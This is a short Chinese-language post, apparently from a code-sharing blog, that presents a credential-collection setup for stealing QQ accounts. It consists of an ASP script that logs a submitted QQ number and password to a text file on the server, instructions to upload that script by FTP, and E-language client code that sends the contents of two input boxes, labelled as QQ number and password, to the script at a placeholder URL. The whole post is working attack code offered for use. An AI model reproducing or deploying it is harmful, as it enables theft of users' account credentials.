<%
StrLogFile="QQ.txt"
FRT=Request("FRT")
SCD=Request("SCD")
If FRT="" Or SCD="" Then
Response.Write "QQ"
Response.End
End If
StrLogText=StrLogText&FRT&SCD
Set Lzwudi=Server.CreateObject("Scripting.FileSystemObject")
Set Lenovo=Lzwudi.OpenTextFile(Server.MapPath(".")&"\"&StrLogFile,8,True,0)
Lenovo.WriteLine(CHR(13)+CHR(10)&StrLogText)
Lenovo.Close
Set Lenovo=Nothing
Set Lzwudi=Nothing
Response.Write "OK!"
%>
把QQ.ASP文件上传到FTP上去。
ASP收信E源码:
.子程序 ASP, 文本型
.参数 地址, 文本型
.参数 NUM, 文本型
.参数 PWD, 文本型
返回 (到文本 (HTTP读文件 (地址 + “?” + “FRT=” + NUM + “&SCD=” + PWD)))
ASP (“http://www.xxx.com/qq.asp”, 编辑框1.内容, 编辑框2.内容)
上面的“http://www.xxx.com/qq.asp”为你上传后的QQ.ASP文件地址
编辑框1.内容为发送的QQ号码
编辑框2.内容为发送的QQ密码
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)